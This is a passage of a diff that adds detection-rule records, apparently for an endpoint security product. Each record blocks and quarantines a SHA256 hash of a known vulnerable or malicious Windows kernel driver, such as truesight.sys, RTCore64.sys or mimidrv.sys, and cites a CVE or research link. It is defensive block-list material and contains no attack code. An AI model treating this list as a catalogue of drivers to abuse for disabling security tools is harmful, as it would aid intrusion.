+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5316670c0bddc0519ef96b2db89285a8620a260429a97f9d2cf5b58b0287d91",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34bfeb17-d72c-5324-8967-04d517c28f57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148642Z",
+ "creation_date": "2026-03-23T11:45:31.148644Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148650Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2c1357cea813ee63c6411dc97ebb5ea5ac0bb53062ca220054c85524d1b544a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34c87cc4-4c84-5999-b4c3-bb1fb4c2743d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979134Z",
+ "creation_date": "2026-03-23T11:45:29.979136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6",
+ "comment": "Vulnerable Kernel Driver (aka elrawdsk.sys) [https://www.loldrivers.io/drivers/205721b7-b83b-414a-b4b5-8bacb4a37777/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34c9f06f-57d8-573b-886d-20a488f24e90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811345Z",
+ "creation_date": "2026-03-23T11:45:31.811347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811353Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2774201da4346d65def60845228d89663de37c880b5d55c9abbb3ba9662a275c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34cf753c-1329-5288-b9ce-0d6ee398b8a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143355Z",
+ "creation_date": "2026-03-23T11:45:32.143357Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143362Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c857c2db1fe1b9c979079add29d5b970147d6a264b4095e6579b5d0669c2b572",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34d3bc6b-1583-518b-a70e-827d9ea3a7a6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475411Z",
+ "creation_date": "2026-03-23T11:45:31.475415Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475425Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7781540202aa5ef6992f9293a77b08043d350ca58e00f5bfa30afdb4b8e57f54",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34d68b0d-738b-5323-be19-fda81fd8ca1e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977997Z",
+ "creation_date": "2026-03-23T11:45:29.977999Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978004Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "350e15bf24dcfdc052db117718329a03e930c17ac8c835e51d001e74bad784e4",
+ "comment": "Vulnerable Kernel Driver (aka LgDCatcher.sys) [https://www.loldrivers.io/drivers/a8e999ee-746f-4788-9102-c1d3d2914f56/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34e48092-15b4-5cbe-b10a-ceb9ceaf5430",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458164Z",
+ "creation_date": "2026-03-23T11:45:30.458167Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0b6a410c22cc36f478ff874d4a23d2e4b4e37c6e55f2a095fc4c3ef32bcb763",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34f1b644-0803-53df-9e78-153cd3a3cf5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835206Z",
+ "creation_date": "2026-03-23T11:45:30.835209Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835219Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2bdf9e7e737444d1acec610729ddbb485f98931ccb86adaac65ec35473a46a3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "351150ff-0ac1-51cf-9928-e773063cdf98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145107Z",
+ "creation_date": "2026-03-23T11:45:31.145110Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145115Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34c0711fb9ddeaea1bab040fb4b3bbf3f50039164aaad0de0764b52201866058",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3521921b-1b96-5f11-ab1d-517ac1710d12",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982503Z",
+ "creation_date": "2026-03-23T11:45:29.982505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982510Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d60819f0ab8547dcd4eb18d39a0c317ec826332afa19c0a6af94bc681a21f14",
+ "comment": "Vulnerable Kernel Driver (aka 1.sys) [https://www.loldrivers.io/drivers/a5792a63-ba77-44ac-bd4a-134b24b01033/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "352befa1-64ae-580a-a206-33dd8ccecbe0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498146Z",
+ "creation_date": "2026-03-23T11:45:31.498150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f0b37c4ce0ba64bc3ae08f1443ef73ca7e47a3f3db145b7d243618c1f988c7be",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "353ac27c-b6b1-5840-ace4-0791124e9cc2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817488Z",
+ "creation_date": "2026-03-23T11:45:30.817490Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5449e4dd1b75a7d52922c30baeca0ca8e32fe2210d1e72af2a2f314a5c2268fb",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "354c0ecc-23ff-506e-96f4-ef5df72cc8ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476050Z",
+ "creation_date": "2026-03-23T11:45:30.476054Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476062Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0cfb7ea2cc515a7fe913ab3619cbfcf1ca96d8cf72dc350905634a5782907a49",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3555aa25-191a-5814-96b2-7500165dbaf0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967729Z",
+ "creation_date": "2026-03-23T11:45:29.967731Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967736Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3876e1d070de070ca46423d1a444da1906a7e8136288dce76c840010017a47c9",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35622616-b5d4-5c21-8be9-d88dd5e4e457",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820213Z",
+ "creation_date": "2026-03-23T11:45:30.820215Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820221Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ddcca718ae393cf1d3fd57ddd648484b97c95086bc1c77c6e00d8cd86d60bd8",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "356b6fe3-c6a2-5ef9-ae0c-9457fde490c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492979Z",
+ "creation_date": "2026-03-23T11:45:31.492982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492990Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a0c2b8f072d58a7ed0d774a6d9329f55819a478e97aa568bfc955e5ff4c698c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "356cea6f-9112-5831-afb6-38afc6be9321",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474235Z",
+ "creation_date": "2026-03-23T11:45:31.474239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d48724981a38495983357464c6c16a1d911b7d7ba9730f33b6042bb71720c08",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35712b77-88a5-5480-89c2-192b8335477b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607650Z",
+ "creation_date": "2026-03-23T11:45:29.607652Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6cb6e23ba516570bbd158c32f7c7c99f19b24ca4437340ecb39253662afe4293",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35877ffd-4776-55b0-9e27-8c803d45725e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975006Z",
+ "creation_date": "2026-03-23T11:45:29.975008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975013Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60571dbcaec96d9517e0d116d066e70ae747aa4396d7857b2eea0f4c1a5a70b4",
+ "comment": "Vulnerable Kernel Driver (aka amsdk.sys) [https://www.loldrivers.io/drivers/a285591e-ad3c-46a3-a648-c58589ff5efc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35989926-1906-5f9d-8df1-3145313f48c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823233Z",
+ "creation_date": "2026-03-23T11:45:31.823236Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823245Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc46e5b6b1ffaca1d534f3c2d7e1f98200c8e75980ab5abd58b7142604c99696",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3598f70a-ec31-5253-85a8-775e57057167",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818186Z",
+ "creation_date": "2026-03-23T11:45:31.818189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818198Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57c8bbdc617fea993266198ade9cd04582df9d8f896abaa011d3d97574046b37",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "359bbb5b-f054-5600-8f9a-5e9a5263623e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466807Z",
+ "creation_date": "2026-03-23T11:45:30.466810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466819Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af7ca247bf229950fb48674b21712761ac650d33f13a4dca44f61c59f4c9ac46",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "35adc59f-0107-5b67-a529-f5534c6bcaed",
